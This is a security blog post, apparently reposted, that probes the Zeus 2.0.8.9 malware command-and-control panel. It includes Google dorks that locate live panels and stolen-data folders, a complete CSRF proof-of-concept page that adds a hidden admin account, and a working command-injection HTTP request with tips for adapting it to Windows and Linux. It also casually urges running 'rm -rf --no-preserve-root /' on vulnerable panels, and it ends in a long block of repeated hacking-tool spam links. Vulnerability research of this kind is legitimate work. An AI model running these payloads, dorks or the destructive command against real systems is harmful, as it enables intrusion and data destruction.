I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)
The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.
First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
- inurl:cp.php?m=login - this should be the login to the control panel
- inurl:_reports/files - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
- inurl:install/index.php - this should be deleted, but I think this is useless now.
Boring vulns found
- Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
- No password policy - admins can set up really weak passwords
- No anti brute-force - you can try to guess the admin's password. Default username is admin
- Password autocomplete enabled - boring
- Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
- No CSRF protection - except on the password change, where the old password is needed :-( boring
<html> <head> <title></title> </head> <body> <pre> This is a CSRF POC to create a new admin user in Zeus admin panels. Username: user_1392719246 Password: admin1 You might change the URL from 127.0.0.1. Redirecting in a hidden iframe in <span id="countdown">10</span> seconds. </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe> <form action="http://127.0.0.1/cp.php?m=sys_users&new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame"> <input name="name" type="hidden" value="user_1392719246" /> <input name="password" type="hidden" value="admin1" /> <input name="status" type="hidden" value="1" /> <input name="comment" type="hidden" value="PWND!" /> <input name="r_botnet_bots" type="hidden" value="1" /> <input name="r_botnet_scripts" type="hidden" value="1" /> <input name="r_botnet_scripts_edit" type="hidden" value="1" /> <input name="r_edit_bots" type="hidden" value="1" /> <input name="r_reports_db" type="hidden" value="1" /> <input name="r_reports_db_edit" type="hidden" value="1" /> <input name="r_reports_files" type="hidden" value="1" /> <input name="r_reports_files_edit" type="hidden" value="1" /> <input name="r_reports_jn" type="hidden" value="1" /> <input name="r_stats_main" type="hidden" value="1" /> <input name="r_stats_main_reset" type="hidden" value="1" /> <input name="r_stats_os" type="hidden" value="1" /> <input name="r_system_info" type="hidden" value="1" /> <input name="r_system_options" type="hidden" value="1" /> <input name="r_system_user" type="hidden" value="1" /> <input name="r_system_users" type="hidden" value="1" /> </form> <script type="text/javascript"> window.onload=function(){ var counter = 10; var interval = setInterval(function() { counter--; document.getElementById('countdown').innerHTML = counter; if (counter == 0) { redirect(); clearInterval(interval); } }, 1000); }; function redirect() { document.getElementById("csrf-form").submit(); } </script> </body> </html>
- MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
- ClickJacking - really boring stuff
- Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
- SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.
Whats good news (for the C&C panel owners)
The following stuff looks good, at least some vulns were taken seriously:
- The system directory is protected with .htaccess deny from all.
- gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
- Anti XSS: the following code is used almost everywhere
return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.
What's really bad news (for the C&C panel owners)
And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).
The vulnerable code is in system/fsarc.php:
function fsarcCreate($archive, $files){ ... $archive .= '.zip'; $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"'; exec($cli, $e, $r); }
The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60 filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.
Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)
That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )
Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)
Related news
- Hack Tool Apk No Root
- Pentest Recon Tools
- Hacking Tools Usb
- Hack Tools Download
- Hack Tools Download
- Hacking Apps
- How To Install Pentest Tools In Ubuntu
- Hacker Tools For Mac
- Hack Rom Tools
- Hacking Tools Download
- Hack Tools Mac
- Hack Apps
- Hack Tool Apk
- Hacker Tools List
- Hacker Tools Online
- Hack Tools
- Hacker Tools Free Download
- Hack Tools Github
- Hacker Tools
- Hack Tools
- Underground Hacker Sites
- Computer Hacker
- Hack Website Online Tool
- Hacker Tools Github
- Hack Tools
- Hack Tool Apk No Root
- Pentest Reporting Tools
- Pentest Tools Website
- Ethical Hacker Tools
- Computer Hacker
- Hacking Tools For Games
- Hacker Tools For Pc
- Hacker Tools
- Hack Apps
- What Are Hacking Tools
- Pentest Tools List
- Hack Tool Apk No Root
- Pentest Tools Review
- Hacker Tools 2020
- How To Make Hacking Tools
- Ethical Hacker Tools
- Hacker Tools For Pc
- Hacker Tools For Mac
- Pentest Tools Port Scanner
- Computer Hacker
- Hacking Tools Windows
- Underground Hacker Sites
- Hacking Tools For Windows 7
- Hacking Tools And Software
- Hacking Tools Free Download
- Free Pentest Tools For Windows
- Hacking Tools Hardware
- Computer Hacker
- Pentest Tools Review
- Hack Rom Tools
- Hackrf Tools
- Hacking Tools For Pc
- Tools Used For Hacking
- Computer Hacker
- Hack Rom Tools
- How To Install Pentest Tools In Ubuntu
- Nsa Hacker Tools
- Pentest Tools Apk
- Hacker Tools List
- Easy Hack Tools
- Hacking Tools Online
- Hacker Tools For Mac
- Hacking Tools Hardware
- Hack Apps
- Hacker Tools Windows
- Install Pentest Tools Ubuntu
- Hack Tools For Windows
- Pentest Tools Apk
- Hack Tool Apk
- Pentest Tools Android
- Hacker Tools Free
- Pentest Automation Tools
- Game Hacking
- Pentest Tools Url Fuzzer
- How To Install Pentest Tools In Ubuntu
- Hacker Techniques Tools And Incident Handling
- World No 1 Hacker Software
- How To Hack
- Growth Hacker Tools
- Hacker Tools For Pc
- Hacking Tools For Games
- Easy Hack Tools
- Hack Tools For Pc
- Pentest Tools Download
- Wifi Hacker Tools For Windows
- Pentest Tools Url Fuzzer
- Hacking Tools Kit
- Kik Hack Tools
- Underground Hacker Sites
- How To Make Hacking Tools
- Pentest Tools Port Scanner
- Hacking Tools Online
- Hackrf Tools
- Hack Tools For Ubuntu
- How To Make Hacking Tools
- Underground Hacker Sites
- Install Pentest Tools Ubuntu
- Hacker Tool Kit
- Pentest Tools Website Vulnerability
- Hackrf Tools
- Pentest Tools For Windows
- Computer Hacker
- Hacking Tools Online
- Hacker Search Tools
- Hacking Tools 2020
- Growth Hacker Tools
- Beginner Hacker Tools
- Tools 4 Hack
- Hack Website Online Tool
- How To Make Hacking Tools
- Hack Tools For Games
- Pentest Tools Android
- Tools 4 Hack
- Hacker Tools 2020
- Hacking Tools Download
- Hack Tools
- Hacker Tools Windows
- Pentest Tools Tcp Port Scanner
- Hacking Tools Github
- Hacking Tools Software
- Hacker Tools Apk Download
- Hacker Hardware Tools
- Pentest Box Tools Download
- Pentest Tools Find Subdomains
- Pentest Tools Free
- Hacking Tools For Windows Free Download
- Hacker Tools Mac
- Nsa Hacker Tools
- Hack Tools
- Hacking App
- Pentest Automation Tools
- Tools For Hacker
- Hacker Tools 2020
- Hack And Tools
- Hacking Tools Usb
- Kik Hack Tools
- Pentest Tools Url Fuzzer
- Bluetooth Hacking Tools Kali
- Pentest Tools List
- Hacker Tools Linux
- Hacker Tools List
- Hacking Tools For Windows
- Pentest Box Tools Download
- Hacker Tools Mac
- Hacking Tools Kit
- Pentest Tools For Ubuntu
- Pentest Tools Website
- Hackers Toolbox
- Hacking Tools Windows 10
- Pentest Tools Download
- Hack Tools
- Hacking Tools For Pc
- Hacking Tools Software
- Hacking Tools For Games
- Pentest Tools For Android
- Hacking Tools Name
- New Hack Tools
- Hacking Tools Windows
- Hacks And Tools
- Hacker Tools For Windows
- Hacking Tools Free Download
Tidak ada komentar:
Posting Komentar